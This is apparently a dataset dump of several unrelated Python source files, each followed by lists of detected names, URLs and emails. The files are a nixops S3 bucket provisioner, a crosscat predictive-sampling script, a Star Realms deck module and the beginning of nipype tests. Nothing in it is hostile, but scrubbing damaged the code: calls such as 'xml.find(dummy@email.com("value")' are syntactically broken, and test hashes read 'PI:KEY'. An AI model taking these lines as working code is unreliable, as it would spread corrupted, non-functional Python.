['PERSON', ""circle.set('cx""], ['PERSON', ""circle.set('r""], ['URL', 'xml.et'], ['URL', 'self.sv'], ['URL', 'ET.pa'], ['URL', 'skeleton.sv'], ['URL', 'self.mm'], ['URL', 'self.sv'], ['URL', 'self.sv'], ['URL', 'ET.pa'], ['URL', 'skeleton.sv'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.sv'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'self.svg.fi'], ['URL', 'ET.Su'], ['URL', 'el.se'], ['URL', 'el.se'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'self.svg.fi'], ['URL', 'ET.Su'], ['URL', 'circle.se'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'self.svg.fi'], ['URL', 'email.com'], ['URL', 'ET.Su'], ['URL', 'el.se'], ['URL', 'self.mm'], ['URL', 'self.mm'], ['URL', 'self.mm'], ['URL', 'self.mm'], ['URL', 'el.se'], ['URL', 'self.svg.fi'], ['URL', 'email.com'], ['URL', 'ET.Su'], ['URL', 'circle.se'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'circle.se'], ['URL', 'self.mm'], ['URL', 'test.sv']]" +49,"# -*- coding: utf-8 -*- + +# Automatic provisioning of AWS S3 buckets. + +import time +import botocore +import boto3 +import nixops.util +import nixops.resources +import nixops.ec2_utils + + +class S3BucketDefinition(nixops.resources.ResourceDefinition): + """"""Definition of an S3 bucket."""""" + + @classmethod + def get_type(cls): + return ""s3-bucket"" + + @classmethod + def get_resource_type(cls): + return ""s3Buckets"" + + def __init__(self, xml, config={}): + nixops.resources.ResourceDefinition.__init__(self, xml, config) + self.bucket_name = xml.find(dummy@email.com(""value"") + self.region = xml.find(dummy@email.com(""value"") + self.access_key_id = xml.find(dummy@email.com(""value"") + self.policy = xml.find(dummy@email.com(""value"") + self.website_enabled = self.config[""website""][""enabled""] + self.website_suffix = self.config[""website""][""suffix""] + self.website_error_document = self.config[""website""][""errorDocument""] + + def show_type(self): + return ""{0} [{1}]"".format(self.get_type(), self.region) + + +class S3BucketState(nixops.resources.ResourceState): + """"""State of an S3 bucket."""""" + + state = nixops.util.attr_property(""state"", nixops.resources.ResourceState.MISSING, int) + bucket_name = nixops.util.attr_property(""ec2.bucketName"", None) + access_key_id = nixops.util.attr_property(""ec2.accessKeyId"", None) + region = nixops.util.attr_property(""ec2.region"", None) + + + @classmethod + def get_type(cls): + return ""s3-bucket"" + + + def __init__(self, depl, name, id): + nixops.resources.ResourceState.__init__(self, depl, name, id) + self._conn = None + + + def show_type(self): + s = super(S3BucketState, self).show_type() + if self.region: s = ""{0} [{1}]"".format(s, self.region) + return s + + + @property + def resource_id(self): + return self.bucket_name + + def get_definition_prefix(self): + return ""resources.s3Buckets."" + + def connect(self): + if self._conn: return + (access_key_id, secret_access_key) = nixops.ec2_utils.fetch_aws_secret_key(self.access_key_id) + self._conn = boto3.session.Session(region_name=self.region if self.region != ""US"" else ""us-east-1"", + aws_access_key_id=access_key_id, + 
aws_secret_access_key=secret_access_key) + + def create(self, defn, check, allow_reboot, allow_recreate): + + self.access_key_id = defn.access_key_id or nixops.ec2_utils.get_access_key_id() + if not self.access_key_id: + raise Exception(""please set ‘accessKeyId’, $EC2_ACCESS_KEY or $AWS_ACCESS_KEY_ID"") + + if len(defn.bucket_name) > 63: + raise Exception(""bucket name ‘{0}’ is longer than 63 characters."".format(defn.bucket_name)) + + self.connect() + s3client = self._conn.client('s3') + if check or self.state != self.UP: + + self.log(""creating S3 bucket ‘{0}’..."".format(defn.bucket_name)) + try: + ACL = 'private' # ..or: public-read, public-read-write, authenticated-read + s3loc = region_to_s3_location(defn.region) + if s3loc == ""US"": + s3client.create_bucket(ACL = ACL, + Bucket = defn.bucket_name) + else: + s3client.create_bucket(ACL = ACL, + Bucket = defn.bucket_name, + CreateBucketConfiguration = { + 'LocationConstraint': s3loc + }) + except botocore.exceptions.ClientError as e: + if e.response['Error']['Code'] != ""BucketAlreadyOwnedByYou"": raise + + with self.depl._db: + self.state = self.UP + self.bucket_name = defn.bucket_name + self.region = defn.region + + if defn.policy: + self.log(""setting S3 bucket policy on ‘{0}’..."".format(defn.bucket_name)) + s3client.put_bucket_policy(Bucket = defn.bucket_name, + Policy = defn.policy.strip()) + else: + try: + s3client.delete_bucket_policy(Bucket = defn.bucket_name) + except botocore.exceptions.ClientError as e: + # This seems not to happen - despite docs indicating it should: + # [http://docs.aws.amazon.com/AmazonS3/latest/API/RESTBucketDELETEpolicy.html] + if e.response['ResponseMetadata']['HTTPStatusCode'] != 204: raise # (204 : Bucket didn't have any policy to delete) + + if not defn.website_enabled: + try: + s3client.delete_bucket_website(Bucket = defn.bucket_name) + except botocore.exceptions.ClientError as e: + if e.response['ResponseMetadata']['HTTPStatusCode'] != 204: raise + else: + website_config = { 'IndexDocument': { 'Suffix': defn.website_suffix } } + if defn.website_error_document != """": + website_config['ErrorDocument'] = { 'Key': defn.website_error_document} + s3client.put_bucket_website(Bucket = defn.bucket_name, WebsiteConfiguration = website_config) + + + + def destroy(self, wipe=False): + if self.state == self.UP: + self.connect() + try: + self.log(""destroying S3 bucket ‘{0}’..."".format(self.bucket_name)) + bucket = self._conn.resource('s3').Bucket(self.bucket_name) + try: + bucket.delete() + except botocore.exceptions.ClientError as e: + if e.response['Error']['Code'] != ""BucketNotEmpty"": raise + if not self.depl.logger.confirm(""are you sure you want to destroy S3 bucket ‘{0}’?"".format(self.bucket_name)): return False + bucket.objects.all().delete() + bucket.delete() + except botocore.exceptions.ClientError as e: + if e.response['Error']['Code'] != ""NoSuchBucket"": raise + return True + + +def region_to_s3_location(region): + # S3 location names are identical to EC2 regions, except for + # us-east-1 and eu-west-1. 
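+    # Worked examples of the mapping (an illustration inferred only from the
+    # comment above and the two special cases handled below):
+    #   region_to_s3_location('eu-west-1')    -> 'EU'
+    #   region_to_s3_location('us-east-1')    -> 'US'
+    #   region_to_s3_location('eu-central-1') -> 'eu-central-1'  # pass-through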
+ if region == ""eu-west-1"": return ""EU"" + elif region == ""us-east-1"": return ""US"" + else: return region +",6394,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'S3'], ['LOCATION', 'config='], ['PERSON', 'self.access_key_id = xml.find(dummy@email.com(""value'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.co'], ['LOCATION', 'US'], ['LOCATION', 'defn'], ['LOCATION', 'US'], ['URL', 's3client.de'], ['URL', 'botocore.exceptions.Cl'], ['LOCATION', 'US'], ['US_DRIVER_LICENSE', 'S3'], ['URL', 'http://docs.aws.amazon.com/AmazonS3/latest/API/RESTBucketDELETEpolicy.html]'], ['URL', 'nixops.re'], ['URL', 'nixops.ec'], ['URL', 'nixops.resources.Re'], ['URL', 'nixops.resources.Re'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'self.re'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'self.ac'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'xml.fi'], ['URL', 'email.com'], ['URL', 'self.ge'], ['URL', 'self.re'], ['URL', 'nixops.resources.Re'], ['URL', 'nixops.util.at'], ['URL', 'nixops.resources.Re'], ['URL', 'nixops.util.at'], ['URL', 'nixops.util.at'], ['URL', 'ec2.ac'], ['URL', 'nixops.util.at'], ['URL', 'ec2.re'], ['URL', 'nixops.resources.Re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'nixops.ec'], ['URL', 'self.ac'], ['URL', 'boto3.session.Se'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.ac'], ['URL', 'defn.ac'], ['URL', 'nixops.ec'], ['URL', 'utils.ge'], ['URL', 'self.ac'], ['URL', 'self.co'], ['URL', 'conn.cl'], ['URL', 'self.st'], ['URL', 'defn.re'], ['URL', 's3client.cr'], ['URL', 's3client.cr'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re'], ['URL', 'self.de'], ['URL', 'self.st'], ['URL', 'self.re'], ['URL', 'defn.re'], ['URL', 'defn.policy.st'], ['URL', 's3client.de'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re'], ['URL', 'e.re'], ['URL', 'self.st'], ['URL', 'self.co'], ['URL', 'conn.re'], ['URL', 'bucket.de'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re'], ['URL', 'self.depl.logger.co'], ['URL', 'bucket.objects.al'], ['URL', 'bucket.de'], ['URL', 'botocore.exceptions.Cl'], ['URL', 'e.re']]" +50,"# +# Copyright (c) 2010-2014, MIT Probabilistic Computing Project +# +# Lead Developers: Dan Lovell and Jay Baxter +# Authors: Dan Lovell, Baxter Eaves, Jay Baxter, Vikash Mansinghka +# Research Leads: Vikash Mansinghka, Patrick Shafto +# +# Licensed under the Apache License, Version 2.0 (the ""License""); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an ""AS IS"" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+# +import argparse +import sys +from collections import Counter +# +import numpy +import pylab +pylab.ion() +pylab.show() +# +import crosscat.tests.plot_utils as pu +import crosscat.utils.file_utils as fu +import crosscat.utils.sample_utils as su +import crosscat.utils.api_utils as au + + +# parse some arguments +parser = argparse.ArgumentParser() +parser.add_argument('pkl_name', type=str) +parser.add_argument('--inf_seed', default=0, type=int) +parser.add_argument('--hostname', default='127.0.0.1', type=str) +args = parser.parse_args() +pkl_name = args.pkl_name +inf_seed = args.inf_seed +hostname = args.hostname + +# FIXME: getting weird error on conversion to int: too large from inside pyx +def get_next_seed(max_val=32767): # sys.maxint): + return random_state.randint(max_val) + +# resume from saved name +save_dict = fu.unpickle(pkl_name) +random_state = numpy.random.RandomState(inf_seed) +M_c = save_dict['M_c'] +X_L = save_dict['X_L'] +X_D = save_dict['X_D'] + +# FIXME: test constraints +# Y = [su.Bunch(index=2,value=2.3), su.Bunch(index=0,value=-4.)] +Y = None + +# test simple_predictive_sample_observed +views_replicating_samples_params = su.determine_replicating_samples_params(X_L, X_D) +views_samples = [] +for replicating_samples_params in views_replicating_samples_params: + this_view_samples = [] + for replicating_sample_params in replicating_samples_params: + this_view_this_sample = su.simple_predictive_sample( + M_c, X_L, X_D, get_next_seed=get_next_seed, **replicating_sample_params) + this_view_samples.extend(this_view_this_sample) + views_samples.append(this_view_samples) +for view_idx, view_samples in enumerate(views_samples): + data_array = numpy.array(view_samples) + pu.plot_T(data_array) + pylab.title('simple_predictive_sample observed, view %s on local' % view_idx) + +# test simple_predictive_sample_observed REMOTE +# hostname = 'ec2-23-22-208-4.compute-1.amazonaws.com' +URI = 'http://' + hostname + ':8007' +method_name = 'simple_predictive_sample' +# +views_samples = [] +for replicating_samples_params in views_replicating_samples_params: + this_view_samples = [] + for replicating_sample_params in replicating_samples_params: + args_dict = dict( + M_c=save_dict['M_c'], + X_L=save_dict['X_L'], + X_D=save_dict['X_D'], + Y=replicating_sample_params['Y'], + Q=replicating_sample_params['Q'], + n=replicating_sample_params['n'], + ) + this_view_this_sample, id = au.call( + method_name, args_dict, URI) + print id + this_view_samples.extend(this_view_this_sample) + views_samples.append(this_view_samples) +for view_idx, view_samples in enumerate(views_samples): + data_array = numpy.array(view_samples) + pu.plot_T(data_array) + pylab.title('simple_predictive_sample observed, view %s on remote' % view_idx) + +# test simple_predictive_sample_unobserved +observed_Q = views_replicating_samples_params[0][0]['Q'] +Q = [(int(1E6), old_tuple[1]) for old_tuple in observed_Q] +new_row_samples = [] +new_row_sample = su.simple_predictive_sample( + M_c, X_L, X_D, Y, Q, get_next_seed, n=1000) +new_row_samples.extend(new_row_sample) +new_row_samples = numpy.array(new_row_samples) +pu.plot_T(new_row_samples) + +# once more with constraint +Y = [(int(1E6), 0, 100)] +new_row_sample = su.simple_predictive_sample( + M_c, X_L, X_D, Y, Q, get_next_seed, n=1) + +# test impute +# imputed_value = su.impute(M_c, X_L, X_D, Y, [Q[3]], 100, get_next_seed) +",4283,"[['DATE_TIME', '2010-2014'], ['PERSON', 'Dan Lovell'], ['PERSON', 'Jay Baxter'], ['PERSON', 'Dan Lovell'], ['PERSON', 'Baxter Eaves'], ['PERSON', 'Jay 
Baxter'], ['PERSON', 'Vikash Mansinghka'], ['PERSON', 'Patrick Shafto'], ['LOCATION', 'crosscat.utils.sample_utils'], ['LOCATION', 'au'], ['PERSON', ""default='127.0.0.1""], ['PERSON', 'save_dict = fu.unpickle(pkl_name'], ['LOCATION', 'M_c'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['PERSON', 'new_row_samples'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['LOCATION', 'X_L'], ['LOCATION', 'X_D'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'pylab.io'], ['URL', 'pylab.sh'], ['URL', 'crosscat.tests.pl'], ['URL', 'crosscat.utils.fi'], ['URL', 'crosscat.utils.sa'], ['URL', 'argparse.Ar'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'args.pk'], ['URL', 'args.in'], ['URL', 'sys.ma'], ['URL', 'su.de'], ['URL', 'su.si'], ['URL', 'numpy.ar'], ['URL', 'pu.pl'], ['URL', 'ec2-23-22-208-4.compute-1.amazonaws.com'], ['URL', 'au.ca'], ['URL', 'numpy.ar'], ['URL', 'pu.pl'], ['URL', 'su.si'], ['URL', 'numpy.ar'], ['URL', 'pu.pl'], ['URL', 'su.si'], ['URL', 'su.im']]" +51,"# -*- coding: utf-8 -*- +"""""" +.. module:: deck + :synopsis: Encapsulates the behavior of card collections +.. moduleauthor:: Zach Mitchell dummy@email.com +"""""" + +from random import shuffle +from typing import List +from .cards import ( + Card, + CardFaction, + CardEffect, + CardAction, + CardTarget +) +from .cardrepo import CardRepo +from .exceptions import ( + RealmsException, + MainDeckEmpty, + PlayerDeckEmpty, + PlayerDeckInitSize, + PlayerDeckInitContents, + UUIDNotFoundError, + HandInitError +) +from collections import Counter +from typing import NamedTuple + +CardList = List[Card] +EffectList = List[CardEffect] +FactionList = List[CardFaction] + + +EffectRecord = NamedTuple('EffectRecord', [ + ('target', CardTarget), + ('action', CardAction), + ('value', int), + ('uuid', str), + ('provider', str)]) + + +class PlayerDeck(object): + """""" + Records the state of the player's deck + + At any given point in time the player may have three piles of cards: undrawn cards, a + hand of cards, and a pile of used (discarded) cards. PlayerDeck records which cards are + in which pile, provides an interface from which a hand of cards can be assembled, and + shuffles the deck when necessary. 
+ + Parameters + ---------- + player_cards : List[Card] + The list of cards from which the player's starting deck will be constructed + + Raises + ------ + PlayerDeckInitSize + Raised when constructing the deck with the wrong number of cards + PlayerDeckInitContents + Raised when constructing the deck with cards other than Vipers and Scouts + """""" + + starting_size = 10 + + def __init__(self, player_cards: CardList): + try: + self._validate_deck_size(player_cards) + self._validate_deck_contents(player_cards) + except RealmsException: + raise + self._undrawn: CardList = player_cards + shuffle(self._undrawn) # shuffled in place + self._discards: CardList = [] + + @staticmethod + def _validate_deck_size(cards: CardList) -> None: + """"""Ensures that the starting deck contains the correct + number of cards + + Parameters + ---------- + cards : CardList + The tentative starting deck + + Raises + ------ + PlayerDeckInitSize + Raised if the tentative starting deck is not the correct size + """""" + if len(cards) != PlayerDeck.starting_size: + raise PlayerDeckInitSize(len(cards)) + return + + @staticmethod + def _validate_deck_contents(cards) -> None: + """"""Ensures that the tentative starting deck contains only Vipers and Scouts + + Parameters + ---------- + cards : CardList + The tentative starting deck + + Raises + ------ + PlayerDeckInitContents + Raised if the tentative starting deck contains cards other than Vipers or Scouts + """""" + for c in cards: + if (c.name != 'Viper') and (c.name != 'Scout'): + raise PlayerDeckInitContents(c.name) + return + + def _next_card(self) -> Card: + """"""Produces the next card from the player's deck + + Attempts to draw a card from the top of the undrawn pile. If + the undrawn pile is empty, the undrawn pile is replenished from + the discard pile and shuffled before attempting to draw a card again. + An attempt to draw a card from the undrawn pile while both the undrawn + pile and discard pile are empty will raise a ``PlayerDeckEmpty`` exception. 
+ + Returns + ------- + Card + A card from the top of the undrawn pile + + Raises + ------ + PlayerDeckEmpty + Raised when attempting to draw a card while both undrawn and discard + piles are empty + """""" + if len(self._undrawn) > 0: + return self._undrawn.pop() + elif len(self._discards) > 0: + self._refill_undrawn() + return self._undrawn.pop() + else: + raise PlayerDeckEmpty + + @property + def cards_remaining(self) -> int: + """"""The total number of cards left in the undrawn and discard piles + + Returns + ------- + int + The number of cards left to draw from + """""" + return len(self._undrawn) + len(self._discards) + + def _refill_undrawn(self) -> None: + """"""Refills the undrawn pile with cards from the discard pile + + Note + ---- + The cards in the discard pile are shuffled before being placed + back into the undrawn pile + """""" + self._undrawn: CardList = self._discards + shuffle(self._undrawn) # shuffled in place + self._discards: CardList = [] + return + + def discard(self, card: Card) -> None: + """"""Sends the card to the discard pile + + Parameters + ---------- + card : Card + The card to send to the discard pile + """""" + self._discards.append(card) + return + + def draw(self, num=5) -> CardList: + """"""Draws the specified number of cards from the undrawn pile + + Parameters + ---------- + num : int (Optional) + The number of cards to draw (Default is 5) + + Returns + ------- + List[Card] + The list of cards that were drawn + + Raises + ------ + IndexError + Raised if no cards are left to draw, or the number of cards requested + is not a positive integer + + Note + ---- + If there are cards remaining in the deck but there are fewer cards than + were requested, then as many cards as possible are returned. + """""" + if (num <= 0) or (self.cards_remaining == 0) or (not isinstance(num, int)): + raise IndexError + cards: CardList = [] + for _ in range(num): + try: + cards.append(self._next_card()) + except PlayerDeckEmpty: + break + return cards + + def _scrap(self, card): + """""" + Permanently removes a card from the discard pile + """""" + pass + + +class MainDeck(object): + """"""The deck from which players can acquire cards + + Parameters + ---------- + cardrepo : CardRepo + The repository from which the cards are obtained + """""" + def __init__(self, cardrepo: CardRepo): + self._repo: CardRepo = cardrepo + self._cards: CardList = self._repo.main_deck_cards() + shuffle(self._cards) + return + + def next_card(self) -> Card: + """"""Produces the next card from the main deck + + Returns + ------- + Card + A card from the top of the main deck + + Raises + ------ + MainDeckEmpty + Raised when attempting to draw a card when the deck is empty + """""" + if len(self._cards) > 0: + return self._cards.pop() + else: + raise MainDeckEmpty + + +class TradeRow(object): + """"""Presents the cards that players may acquire + + Parameters + ---------- + maindeck : MainDeck + The deck from which the trade row is drawn + cardrepo : CardRepo + The repository from which cards are obtained + """""" + def __init__(self, maindeck: MainDeck, cardrepo: CardRepo): + self._maindeck: MainDeck = maindeck + self._repo: CardRepo = cardrepo + self._explorer = None + self._cards = [] + + @property + def available(self) -> CardList: + """"""Produces the list of all cards available for purchase + + Returns + ------- + List[Card] + The list of cards available for purchase + """""" + return self.cards + [self.explorer] + + @property + def cards(self) -> CardList: + """"""Produces the list of cards 
available for purchase + from the main deck + + Returns + ------- + List[Card] + The list of available cards from the main deck + """""" + while len(self._cards) < 5: + try: + card: Card = self._maindeck.next_card() + except MainDeckEmpty: + break + self._cards.append(card) + return self._cards + + @property + def explorer(self) -> Card: + """"""Produces the current Explorer available for purchase + + Returns + ------- + Card + The current Explorer + """""" + if self._explorer is None: + self._explorer: Card = self._repo.new_explorer() + return self._explorer + + def acquire(self, uuid: str) -> Card: + """"""Produces the card with the specified UUID + + Parameters + ---------- + uuid : str + The UUID of the card the player wishes to acquire + + Returns + ------- + Card + The card with the specified UUID + + Raises + ------ + UUIDNotFoundError + Raised when the UUID of the requested card is not found + in the list of available cards + """""" + cards_bools = [c.uuid == uuid for c in self.cards] + if True in cards_bools: + i = cards_bools.index(True) + return self._cards.pop(i) + elif self.explorer.uuid == uuid: + card = self._explorer + self._explorer = None + return card + else: + raise UUIDNotFoundError + + def scrap(self, uuid: str) -> None: + """"""Permanently removes a card from the trade row + + Parameters + ---------- + uuid : str + The UUID of the card to remove + """""" + cards_bools = [c.uuid == uuid for c in self.cards] + if True in cards_bools: + i = cards_bools.index(True) + del self._cards[i] + elif self.explorer.uuid == uuid: + self._explorer = None + else: + raise UUIDNotFoundError + return + + +class Hand(object): + """"""The player's hand of cards + + A Hand is made from a list of cards drawn from the undrawn pile of the player's deck, + as well as any bases that were played previously and have not been destroyed. + + The processing of cards into a collection of effects is a multi-step process: + + 1. The basic effects are pulled from each card + 2. The factions are tallied up to see which cards may activate their ally abilities + 3. Ally abilities are pulled from each card + 4. The effects are aggregated by their action types + 5. Effects are applied in whatever order the user chooses + 6. 
If cards are drawn as the result of an action, the effects list is updated + + Parameters + ---------- + to_draw : int + The number of cards to draw initially + existing_bases : List[Card] + Any bases that were played previously and have not yet been destroyed + playerdeck : PlayerDeck + The player's deck + """""" + def __init__(self, to_draw: int, existing_bases: CardList, playerdeck: PlayerDeck): + if (to_draw < 0) or (to_draw > 5): + raise HandInitError + try: + drawn: CardList = playerdeck.draw(to_draw) + except IndexError: + drawn: CardList = [] + self.cards = drawn + existing_bases + self._playerdeck = playerdeck + return + + @staticmethod + def _collect_basic_effects(cards: List[Card]) -> List[EffectRecord]: + """"""Assembles a list of `EffectRecord`s from the cards in the hand + """""" + basic_effects: List[EffectRecord] = [] + for c in cards: + effects: List[CardEffect] = c.effects_basic + records = [EffectRecord(target=e.target, + action=e.action, + value=e.value, + uuid=e.uuid, + provider=c.uuid) + for e in effects] + basic_effects += records + return records + + @staticmethod + def _collect_ally_factions(cards: List[Card]) -> List[CardFaction]: + """"""Assembles a list of factions that should have their ally abilities activated + """""" + factions: CardFaction = [c.faction for c in cards] + if CardFaction.ALL in factions: + return [CardFaction.BLOB, CardFaction.STAR, CardFaction.FEDERATION, CardFaction.MACHINE] + counts = Counter(factions) + allies: List[CardFaction] = [key for key in counts.keys() + if counts[key] > 1 and key != CardFaction.UNALIGNED] + return allies + + @staticmethod + def _collect_ally_effects(cards: List[Card], facs: List[CardFaction]) -> List[EffectRecord]: + """"""Assembles a list of the ally effects that are applicable + """""" + ally_effects: List[EffectRecord] = [] + for c in cards: + effects: List[CardEffect] = c.effects_ally + records = [EffectRecord(target=e.target, + action=e.action, + value=e.value, + uuid=e.uuid, + provider=c.uuid) + for e in effects if c.faction in facs] + ally_effects += records + return ally_effects + + def _collect_effects(self) -> List[EffectRecord]: + """"""Assembles a list of effects provided by the player's hand + """""" + basic_effects: List[EffectRecord] = Hand._collect_basic_effects(self.cards) + ally_factions: List[CardFaction] = Hand._collect_ally_factions(self.cards) + ally_effects: List[EffectRecord] = Hand._collect_ally_effects(self.cards, ally_factions) + return basic_effects + ally_effects +",13773,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Zach Mitchell'], ['PERSON', 'EffectRecord'], ['PERSON', 'str'], ['PERSON', 'str'], ['PERSON', 'MainDeck = maindeck'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ':: '], ['URL', 'email.com'], ['URL', 'PlayerDeck.st'], ['URL', 'c.na'], ['URL', 'c.na'], ['URL', 'c.na'], ['URL', 'self.ca'], ['URL', 'repo.ma'], ['URL', 'self.ca'], ['URL', 'maindeck.ne'], ['URL', 'repo.ne'], ['URL', 'self.ca'], ['URL', 'bools.in'], ['URL', 'self.ca'], ['URL', 'bools.in'], ['URL', 'self.ca'], ['URL', 'e.ac'], ['URL', 'e.va'], ['URL', 'CardFaction.AL'], ['URL', 'CardFaction.ST'], ['URL', 'CardFaction.MA'], ['URL', 'counts.ke'], ['URL', 'e.ac'], ['URL', 'e.va'], ['URL', 'self.ca'], ['URL', 'self.ca'], ['URL', 'self.ca']]" +52,"# -*- coding: utf-8 -*- +# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*- +# vi: set ft=python sts=4 ts=4 sw=4 et: +from __future__ import print_function, unicode_literals +from future import standard_library +standard_library.install_aliases() + +from 
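A self-contained sketch of the draw/refill mechanic documented by `PlayerDeck._next_card` in the row above: draw from the undrawn pile, reshuffle the discards back in when it runs dry, and fail only when both piles are empty. The names here (`MiniDeck`, `DeckEmpty`, the card strings) are hypothetical illustration, not part of the dataset row:

from random import shuffle


class DeckEmpty(Exception):
    pass


class MiniDeck:
    def __init__(self, cards):
        self.undrawn = list(cards)
        shuffle(self.undrawn)          # shuffled in place, as in PlayerDeck
        self.discards = []

    def next_card(self):
        # Refill from the discard pile only when the undrawn pile is dry.
        if not self.undrawn and self.discards:
            self.undrawn, self.discards = self.discards, []
            shuffle(self.undrawn)
        if not self.undrawn:
            raise DeckEmpty            # both piles empty; mirrors PlayerDeckEmpty
        return self.undrawn.pop()


deck = MiniDeck(['Scout'] * 8 + ['Viper'] * 2)
hand = [deck.next_card() for _ in range(5)]    # draw a 5-card hand

Swapping the two piles before reshuffling keeps the refill cheap and preserves the shuffled-in-place behaviour the docstrings call out.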
builtins import open, str, bytes +import os +import tempfile +import shutil +import warnings +import simplejson as json + +from nipype.testing import (assert_equal, assert_not_equal, assert_raises, + assert_true, assert_false, with_setup, package_check, + skipif, example_data) +import nipype.interfaces.base as nib +from nipype.utils.filemanip import split_filename +from nipype.interfaces.base import Undefined, config +from traits.testing.nose_tools import skip +import traits.api as traits + + +def test_bunch(): + b = nib.Bunch() + yield assert_equal, b.__dict__, {} + b = nib.Bunch(a=1, b=[2, 3]) + yield assert_equal, b.__dict__, {'a': 1, 'b': [2, 3]} + + +def test_bunch_attribute(): + b = nib.Bunch(a=1, b=[2, 3], c=None) + yield assert_equal, b.a, 1 + yield assert_equal, b.b, [2, 3] + yield assert_equal, b.c, None + + +def test_bunch_repr(): + b = nib.Bunch(b=2, c=3, a=dict(n=1, m=2)) + yield assert_equal, repr(b), ""Bunch(a={'m': 2, 'n': 1}, b=2, c=3)"" + + +def test_bunch_methods(): + b = nib.Bunch(a=2) + b.update(a=3) + newb = b.dictcopy() + yield assert_equal, b.a, 3 + yield assert_equal, b.get('a'), 3 + yield assert_equal, b.get('badkey', 'otherthing'), 'otherthing' + yield assert_not_equal, b, newb + yield assert_equal, type(dict()), type(newb) + yield assert_equal, newb['a'], 3 + + +def test_bunch_hash(): + # NOTE: Since the path to the json file is included in the Bunch, + # the hash will be unique to each machine. + pth = os.path.split(os.path.abspath(__file__))[0] + json_pth = os.path.join(pth, 'realign_json.json') + b = nib.Bunch(infile=json_pth, + otherthing='blue', + yat=True) + newbdict, bhash = b._get_bunch_hash() + yield assert_equal, bhash, 'PI:KEY' + # Make sure the hash stored in the json file for `infile` is correct. + jshash = nib.md5() + with open(json_pth, 'r') as fp: + jshash.update(fp.read().encode('utf-8')) + yield assert_equal, newbdict['infile'][0][1], jshash.hexdigest() + yield assert_equal, newbdict['yat'], True + + +# create a temp file +# global tmp_infile, tmp_dir +# tmp_infile = None +# tmp_dir = None +def setup_file(): + # global tmp_infile, tmp_dir + tmp_dir = tempfile.mkdtemp() + tmp_infile = os.path.join(tmp_dir, 'foo.txt') + with open(tmp_infile, 'w') as fp: + fp.writelines(['123456789']) + return tmp_infile + + +def teardown_file(tmp_dir): + shutil.rmtree(tmp_dir) + + +def test_TraitedSpec(): + yield assert_true, nib.TraitedSpec().get_hashval() + yield assert_equal, nib.TraitedSpec().__repr__(), '\n\n' + + class spec(nib.TraitedSpec): + foo = nib.traits.Int + goo = nib.traits.Float(usedefault=True) + + yield assert_equal, spec().foo, Undefined + yield assert_equal, spec().goo, 0.0 + specfunc = lambda x: spec(hoo=x) + yield assert_raises, nib.traits.TraitError, specfunc, 1 + infields = spec(foo=1) + hashval = ([('foo', 1), ('goo', '0.0000000000')], 'PI:KEY') + yield assert_equal, infields.get_hashval(), hashval + # yield assert_equal, infields.hashval[1], hashval[1] + yield assert_equal, infields.__repr__(), '\nfoo = 1\ngoo = 0.0\n' + + +@skip +def test_TraitedSpec_dynamic(): + from pickle import dumps, loads + a = nib.BaseTraitedSpec() + a.add_trait('foo', nib.traits.Int) + a.foo = 1 + assign_a = lambda: setattr(a, 'foo', 'a') + yield assert_raises, Exception, assign_a + pkld_a = dumps(a) + unpkld_a = loads(pkld_a) + assign_a_again = lambda: setattr(unpkld_a, 'foo', 'a') + yield assert_raises, Exception, assign_a_again + + +def test_TraitedSpec_logic(): + class spec3(nib.TraitedSpec): + _xor_inputs = ('foo', 'bar') + + foo = 
